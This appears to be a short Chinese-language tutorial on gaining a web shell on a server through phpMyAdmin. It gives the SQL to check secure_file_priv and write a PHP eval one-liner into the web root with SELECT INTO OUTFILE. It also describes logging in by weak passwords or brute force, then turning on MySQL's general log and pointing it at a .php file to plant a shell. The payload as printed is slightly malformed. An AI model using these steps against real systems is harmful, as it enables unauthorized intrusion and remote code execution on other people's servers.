尝试用phpmyadmin去getshell
PHPmyadmin getshell的方法
1、 show global variables like ‘% secure-file-priv %’如果该参数设置为空或者指定文件夹可以利用,然后写木马,select “<?php @eval($_POST[k];?)>” into outfile “/var/www/html/conf.php”
2、 利用日志文件getshell
常见的日志文件分为业务(常见服务)日志和系统日志
利用phpmyadmin的日志文件去getshell,mysql>5.0会创建日主文件,是全局变量且可读写
(1)通过弱口令或者爆破的方式登陆phpmyadmin,执行sql语句:
select @@datadir;
猜源码存放的位置:D:\phpstudy_pro\www
查看日志状态:show variables like ‘%general%’;
执行命令set global general_log = ‘on’来开启日志记录功能并修改记录的路径和文件名。
再次查看,已开启
修改路径
Set global general_log_file=’H:\\webroot\\log.php’
查看,路径已经改变
写入木马即可